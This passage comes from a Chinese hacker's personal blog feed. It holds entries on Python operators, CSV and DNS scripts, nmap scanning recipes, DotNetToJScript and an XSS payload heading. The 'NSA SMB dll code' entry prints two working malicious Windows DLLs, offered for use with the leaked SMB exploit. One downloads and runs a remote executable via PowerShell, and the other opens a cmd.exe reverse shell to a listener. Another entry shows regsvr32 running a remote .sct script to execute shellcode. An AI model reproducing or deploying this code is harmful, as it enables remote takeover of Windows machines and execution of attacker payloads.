<embed height="415" width="544" quality="high" allowfullscreen="true" type="application/x-shockwave-flash" src="//static.hdslb.com/miniloader.swf" flashvars="aid=8709991&page=1" pluginspage="//www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">
<p>最后祝天下有情人,终成兄妹</p>
]]></content>
<tags>
<tag> 生活 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[python运算符笔记]]></title>
<url>http://phpplay.github.io/2017/05/12/python%E8%BF%90%E7%AE%97%E7%AC%A6/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div></pre></td><td class="code"><pre><div class="line">+</div><div class="line">加</div><div class="line">7+8 '7'+'8'</div><div class="line"></div><div class="line">-</div><div class="line">减 取相反数 9-7 -(-7)</div><div class="line"></div><div class="line">*</div><div class="line">乘 字符若干次 9*9 '9'*9</div><div class="line"></div><div class="line"></div><div class="line">/</div><div class="line">除</div><div class="line"></div><div class="line"></div><div class="line">**</div><div class="line">幂运算</div><div class="line">2**3 </div><div class="line"></div><div class="line"><</div><div class="line">小于 返回bool值 9<1</div><div class="line"></div><div class="line">></div><div class="line">大于 返回bool值 9>1</div><div class="line"></div><div class="line"></div><div class="line">!=</div><div class="line">不等于 返回bool值 9!=1</div><div class="line"></div><div class="line"></div><div class="line">//</div><div class="line">除法 求商整数 9//5</div><div class="line"></div><div class="line">%</div><div class="line">取余 9%5</div><div class="line"></div><div class="line"></div><div class="line">&</div><div class="line">按位与 7&8 =0 7&9 =1 000000111 000010000 得到 00000000 00000111 00001001 得到 00000001 二进制的每一位都进行and</div><div class="line"></div><div class="line">|</div><div class="line">按位或 7|8 =15 00000111 00001000 00001111 二进制的每一位都进行or</div><div class="line"></div><div class="line">^</div><div class="line">按位异或 每位不相同为1 相同为0 7^8 =15 00000111 000010000 00001111</div><div class="line"></div><div class="line"></div><div class="line">~</div><div class="line">翻转 ~x =- (x+1) ~8 = -9</div><div class="line"></div><div class="line"></div><div class="line">>></div><div class="line">右移 8 >>1 00001000 00000100 向右移动一位 除以2的n次幂</div><div class="line"></div><div class="line"></div><div class="line"><<</div><div class="line">左移 8 <<1 00001000 00010000 向左移动一位 乘以2的n次幂</div><div class="line"></div><div class="line"><=</div><div class="line">大于 8<=1 True</div><div class="line"></div><div class="line">>=</div><div class="line">小于 9>=1 False</div><div class="line"></div><div class="line">==</div><div class="line">相等 9 ==1 False</div><div class="line"></div><div class="line"></div><div class="line">not not True = False</div><div class="line"></div><div class="line">and True and False = False </div><div class="line"></div><div class="line">or True and False = True</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[NSA SMB dll code]]></title>
<url>http://phpplay.github.io/2017/04/20/NSA-SMB/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="这两天最火的是啥?方程式!"><a href="#这两天最火的是啥?方程式!" class="headerlink" title="这两天最火的是啥?方程式!"></a>这两天最火的是啥?方程式!</h2><pre><code>dll 源码
转眼就是是5.20了,回头才发现一个月没写博客了,好浪费啊,没办法,最近太忙了
记录一下自己用的dll源码吧
</code></pre><p>其实也是网上抄的。。。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div></pre></td><td class="code"><pre><div class="line">// dllmain.cpp : 定义 DLL 应用程序的入口点。</div><div class="line">#include "stdafx.h"</div><div class="line">#include <windows.h></div><div class="line"></div><div class="line">void Fuck(void);</div><div class="line"></div><div class="line">BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)</div><div class="line">{</div><div class="line"> switch (dwReason)</div><div class="line"> {</div><div class="line"> case DLL_PROCESS_ATTACH:</div><div class="line"> Fuck();</div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_PROCESS_DETACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_THREAD_ATTACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_THREAD_DETACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"> }</div><div class="line"> return TRUE;</div><div class="line">}</div><div class="line"></div><div class="line">void Fuck(void) </div><div class="line">{</div><div class="line"> </div><div class="line"> WinExec("cmd.exe /c powershell.exe -exec bypass -Command (New-Object Net.WebClient).DownloadFile('http://127.0.0.1/1.exe','C:\\Windows\\Temp\\temp.exe');C:\\Windows\\Temp\\temp.exe", SW_NORMAL);</div><div class="line"> //WinExec("net localgroup administrators admin /add", SW_NORMAL);</div><div class="line"> //WinExec("cmd.exe /c dir > c://result.txt", SW_NORMAL); </div><div class="line"> //WinExec("Cmd.exe /C md c://12", SW_HIDE);</div><div class="line"> </div><div class="line"></div><div class="line">}</div></pre></td></tr></table></figure></p>
<hr>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div></pre></td><td class="code"><pre><div class="line">// dllmain.cpp : 定义 DLL 应用程序的入口点。</div><div class="line">#include "stdafx.h"</div><div class="line">#include <winsock2.h> </div><div class="line">#include <stdlib.h></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">#pragma comment(lib,"ws2_32")</div><div class="line">void reverse_shell();</div><div class="line">WSADATA wsaData;</div><div class="line">SOCKET Winsock;</div><div class="line">SOCKET Sock;</div><div class="line">struct sockaddr_in hax;</div><div class="line"></div><div class="line">STARTUPINFO ini_processo;</div><div class="line">PROCESS_INFORMATION processo_info;</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)</div><div class="line">{</div><div class="line"></div><div class="line"></div><div class="line"> switch (dwReason)</div><div class="line"> {</div><div class="line"> case DLL_PROCESS_ATTACH:</div><div class="line"> reverse_shell();</div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_PROCESS_DETACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_THREAD_ATTACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"></div><div class="line"> case DLL_THREAD_DETACH:</div><div class="line"></div><div class="line"> break;</div><div class="line"> }</div><div class="line"> return TRUE;</div><div class="line">}</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">void reverse_shell()</div><div class="line">{</div><div class="line"> LPCSTR szMyUniqueNamedEvent = "sysnullevt";</div><div class="line"> HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);</div><div class="line"></div><div class="line"> switch (GetLastError())</div><div class="line"> {</div><div class="line"> // app is already running</div><div class="line"> case ERROR_ALREADY_EXISTS:</div><div class="line"> {</div><div class="line"> CloseHandle(m_hEvent);</div><div class="line"> break;</div><div class="line"> }</div><div class="line"></div><div class="line"> case ERROR_SUCCESS:</div><div class="line"> {</div><div class="line"></div><div class="line"> break;</div><div class="line"> }</div><div class="line"> }</div><div class="line"></div><div class="line"></div><div class="line"> WSAStartup(MAKEWORD(2, 2), &wsaData);</div><div class="line"> Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);</div><div class="line"></div><div class="line"> hax.sin_family = AF_INET;</div><div class="line"> //nc -lvvp 4431 本机nc监听</div><div class="line"></div><div class="line"> // 端口</div><div class="line"> hax.sin_port = htons(atoi("4431"));</div><div class="line"></div><div class="line"></div><div class="line"> //反弹ip</div><div class="line"> hax.sin_addr.s_addr = inet_addr("127.0.0.1");</div><div class="line"> WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);</div><div class="line"></div><div class="line"> memset(&ini_processo, 0, sizeof(ini_processo));</div><div class="line"> ini_processo.cb = sizeof(ini_processo);</div><div class="line"> ini_processo.dwFlags = STARTF_USESTDHANDLES;</div><div class="line"> ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;</div><div class="line"></div><div class="line"> CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info);</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> 网络安全 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[nmap实用命令]]></title>
<url>http://phpplay.github.io/2017/04/13/nmap%E5%AE%9E%E7%94%A8%E5%91%BD%E4%BB%A4/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="nmap实用命令"><a href="#nmap实用命令" class="headerlink" title="nmap实用命令"></a>nmap实用命令</h2><p>自己总结了几条nmap的实用命令,主要是用来格式化输出,感觉不错,所以记录一下<br>几个参数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">-sS 隐蔽扫描(半开syn)</div><div class="line">-sN 不管是否存在直接扫描</div><div class="line">-sI 完全隐藏。以一个跳板主机{无流量}扫描另一台主机</div></pre></td></tr></table></figure></p>
<p>最常用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">nmap -v -sT -sV -Pn</div></pre></td></tr></table></figure></p>
<p>快速扫描<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">nmap -F 192.168.0.101</div></pre></td></tr></table></figure></p>
<p>syn快速扫描指定端口 格式化输出<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">nmap -p80 -PS80 -oG - 10.193.179.0/24 | awk '/open/{print $2}'</div><div class="line">10.193.179.9</div><div class="line">10.193.179.17</div><div class="line">10.193.179.29</div></pre></td></tr></table></figure></p>
<p>syn快速扫描指定端口 格式化输出带域名<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">nmap -p80 -PS80 -oG - 10.1.1.0/24 | awk '/open/{print $2 " " $3}'</div><div class="line"></div><div class="line">10.1.1.72 (userA.corp.foocompany.biz)</div><div class="line">10.1.1.73 (userB.corp.foocompany.biz)</div><div class="line">10.1.1.75 (userC.corp.foocompany.biz)</div></pre></td></tr></table></figure></p>
<p>指定端口扫描 格式化输出<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">nmap -vv -p 80,4848,7001,7002,7071,8000,8001,8002,8080,8081,8888,9999,9043,9080 10.193.179.0/24 | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} </div><div class="line"></div><div class="line">10.193.179.130:22</div><div class="line">10.193.179.130:22</div></pre></td></tr></table></figure></p>
<p>指定域名文件 格式化输出<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">nmap -vv -iL yuming.txt | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} > output.txt</div><div class="line"></div><div class="line">Warning: Hostname baidu.com resolves to 4 IPs. Using 111.13.101.208.</div><div class="line">Warning: Hostname www.baidu.com resolves to 2 IPs. Using 119.75.218.70.</div><div class="line">119.75.222.122:443</div><div class="line">119.75.218.70:443</div><div class="line">111.13.101.208:443</div><div class="line">119.75.222.122:80</div><div class="line">119.75.218.70:80</div><div class="line">111.13.101.208:80</div></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">从一款扫描器上扒下来的</div><div class="line"></div><div class="line">nmap -sS -T5 -PP -PE -PM -PI -PA20,53,80,113,443,5060,10043 --host-timeout=300m -O --max-rtt-timeout=3000ms --initial-rtt-timeout=1000ms --min-rtt-timeout=1000ms --max-retries=2 --stats-every 10s --traceroute --min-hostgroup=64 -PS1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,873,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4672,4679,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7000-7001,7021,7071,7080,7144,7181,7210,7272,7426,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8800,8812,8834,8880,8888-8890,8899,8901-8903,9000,9002,9010,9080-9081,9084,9090,9099-9100,9111,9152,9200,9390-9391,9495,9788,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27017,27888,27960,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48899,49152,50000-50004,50013,50500-50504,52302,55553,57772,62078,62514,65535 --min-rate=500 -PU46303 -p1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,873,888,902,910,912,921,993,995,998,1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3389,3460,3500,3628,3632,3690,3780,3790,3817,4000,4322,4433,4444-4445,4659,4672,4679,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,6000,6050,6060,6070,6080,6101,6106,6112,6262,6379,6405,6502-6504,6542,6660-6661,6667,6905,6988,7000-7001,7021,7071,7080,7144,7181,7210,7272,7426,7443,7510,7579-7580,7700,7770,7777-7778,7787,7800-7801,7879,7902,8000-8001,8008,8014,8020,8023,8028,8030,8080-8082,8087,8090,8095,8161,8180,8205,8222,8300,8303,8333,8400,8443-8444,8503,8800,8812,8834,8880,8888-8890,8899,8901-8903,9000,9002,9010,9080-9081,9084,9090,9099-9100,9111,9152,9200,9390-9391,9495,9788,9809-9815,9855,9999-10001,10008,10050-10051,10080,10098,10162,10202-10203,10443,10616,10628,11000,11099,11211,11234,11333,12174,12203,12221,12345,12397,12401,13364,13500,13838,14330,15200,16102,17185,17200,18881,19300,19810,20010,20031,20034,20101,20111,20171,20222,22222,23472,23791,23943,25000,25025,26000,26122,27000,27017,27888,27960,28222,28784,30000,30718,31001,31099,32764,32913,34205,34443,37718,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48899,49152,50000-50004,50013,50500-50504,52302,55553,57772,62078,62514,65535 10.193.179.0/24</div></pre></td></tr></table></figure>
<p>http脚本扫描<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">nmap -sV -p 80 -T4 --script http*,default baidu.com</div></pre></td></tr></table></figure></p>
<p>nmap脚本列表<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line">auth: 负责处理鉴权证书(绕开鉴权)的脚本 </div><div class="line">broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 </div><div class="line">brute: 提供暴力破解方式,针对常见的应用如http/snmp等 </div><div class="line">default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力 </div><div class="line">discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等 </div><div class="line">dos: 用于进行拒绝服务攻击 </div><div class="line">exploit: 利用已知的漏洞入侵系统 </div><div class="line">external: 利用第三方的数据库或资源,例如进行whois解析 </div><div class="line">fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽 </div><div class="line">malware: 探测目标机是否感染了病毒、开启了后门等信息 </div><div class="line">safe: 此类与intrusive相反,属于安全性脚本 </div><div class="line">version: 负责增强服务与版本扫描(Version Detection)功能的脚本 </div><div class="line">vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067</div></pre></td></tr></table></figure></p>
<p>参考链接<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">https://nmap.org/man/zh/</div><div class="line">http://gdd.gd/1159.html</div><div class="line">http://www.2cto.com/article/201203/125686.html</div><div class="line">http://www.vuln.cn/2444</div></pre></td></tr></table></figure></p>
]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> nmap </tag>
</tags>
</entry>
<entry>
<title><![CDATA[c#2js]]></title>
<url>http://phpplay.github.io/2017/04/12/c-2js-1/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="c-2js"><a href="#c-2js" class="headerlink" title="c#2js"></a>c#2js</h2><p>今天无意看到subTee Fork 了一个DotNetToJScript的库,一下起了兴趣,看库名就是好东西,结果发现真的是个神器啊</p>
<p>然后看了subTee的blog,就研究了一下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">作用:将c# 转换为 js 调用底层api 运行shellcode ,简直不能再赞</div><div class="line"></div><div class="line">缺点:只能在clr v2 里使用</div></pre></td></tr></table></figure></p>
<p>DotNetToJScript 可以生成js,sct格式文件</p>
<p>不过几个参数我还没搞太懂,但也可以用了,英语太渣了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">-n 生成js</div><div class="line">-m 生成sct </div><div class="line">-u 生成sct 一般常用这个</div><div class="line">-o= 输出到一个文件</div><div class="line">-c= 指定类明</div><div class="line">-s= 使用附加脚本指定文件。创建实例(这一项不太懂)</div></pre></td></tr></table></figure>
<h2 id="test"><a href="#test" class="headerlink" title="test"></a>test</h2><p>我测试时只使用了几个命令<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">DotNetToJScript.exe -n xxx.dll >xxx.js 和</div><div class="line">DotNetToJScript.exe -u xxx.dll >xxx.sct</div><div class="line">wscript xxx.js</div><div class="line">regsvr32 /s /u /i:xxx.sct scrobj.dll</div></pre></td></tr></table></figure></p>
<h2 id="效果图"><a href="#效果图" class="headerlink" title="效果图"></a>效果图</h2><img src="/images/1.png" class="[1]">
<img src="/images/2.png" class="[2]">
<img src="/images/3.png" class="[3]">
<img src="/images/4.png" class="[4]">
<img src="/images/5.png" class="[5]">
<p>效果很好 感觉世界都美起来了,然后又复习了一下regsvr32的常用知识<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname</div><div class="line">/u - 解除服务器注册</div><div class="line">/s - 无声;不显示消息框</div><div class="line">/i - 调用 DllInstall,给其传递一个可选 [cmdline];跟/u一起使用时,卸载dll</div><div class="line">/n - 不要调用DllRegisterServer;这个选项必须跟/i一起使用</div></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">执行本地脚本</div><div class="line">regsvr32 /s /u /i:file.sct scrobj.dll</div><div class="line"></div><div class="line">执行远程脚本</div><div class="line">regsvr32 /s /n /u /i::http://127.0.0.1/2333.sct scrobj.dll</div></pre></td></tr></table></figure>
<h2 id="相关链接"><a href="#相关链接" class="headerlink" title="相关链接"></a>相关链接</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">https://gist.github.com/subTee/618d40aa4229581925eb9025429d8420</div><div class="line"></div><div class="line">http://subt0x10.blogspot.hk/2017/04/using-dotnettojscript-working-example.html</div><div class="line"></div><div class="line">https://github.com/tyranid/DotNetToJScript</div></pre></td></tr></table></figure>
]]></content>
<tags>
<tag> c# </tag>
<tag> javascript </tag>
</tags>
</entry>
<entry>
<title><![CDATA[csv]]></title>
<url>http://phpplay.github.io/2017/04/05/csv-test/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="csv生成"><a href="#csv生成" class="headerlink" title="csv生成"></a>csv生成</h2><p>放假回来后感觉好累,好适合学习,看到别人写的工具可以生成csv,所以就把自己的脚本也添加上试试。还有就是改进了域名验证的过程。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">#save to csv </div><div class="line">def csvs(name,dic):</div><div class="line"> domainfile = name + '.csv'</div><div class="line"> dcsv = open(domainfile, 'wb+')</div><div class="line"> write_d = csv.writer(dcsv)</div><div class="line"> title = " ".join(['domain','ip']).decode("utf8").encode("gb2312").split() </div><div class="line"> write_d.writerow(title)</div><div class="line"> with dcsv as f:</div><div class="line"> for item in dic:</div><div class="line"> line = ','.join(item) + '\n'</div><div class="line"> f.write(line.encode('utf-8')) </div><div class="line"> dcsv.close()</div></pre></td></tr></table></figure>
<h2 id="domain2ip"><a href="#domain2ip" class="headerlink" title="domain2ip"></a>domain2ip</h2><p>写的很简单,就是用gethostbyname获取ip,速度很慢很慢,需要特别改进一下,也许dnspython</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">#domain to ip</div><div class="line">def domain2ip(domain):</div><div class="line"> list2 = []</div><div class="line"> for i in domain:</div><div class="line"> try:</div><div class="line"> result = socket.gethostbyname(i)</div><div class="line"> #print result</div><div class="line"> list2.append(result)</div><div class="line"> except:</div><div class="line"> list2.append('') </div><div class="line"> #print '0.0.0.0'</div><div class="line"> return list2</div></pre></td></tr></table></figure>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>dns查询速度过慢,导致返回过慢,多线程感觉又太卡,socket.gethostbyname阻塞太严重了,所以打算使用别的库来试试,或者直接在其它网站上查询,还需要改进很多<br>自己的python还是渣到不行,没有系统学习过,就是差距</p>
]]></content>
<tags>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[xss常用payload]]></title>
<url>http://phpplay.github.io/2017/03/30/xss/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="xss"><a href="#xss" class="headerlink" title="xss"></a>xss</h2><p>前几天整理了下xss相关的东西,所以记录下常用的payload</p>
<h2 id="整理的payload"><a href="#整理的payload" class="headerlink" title="整理的payload"></a>整理的payload</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div 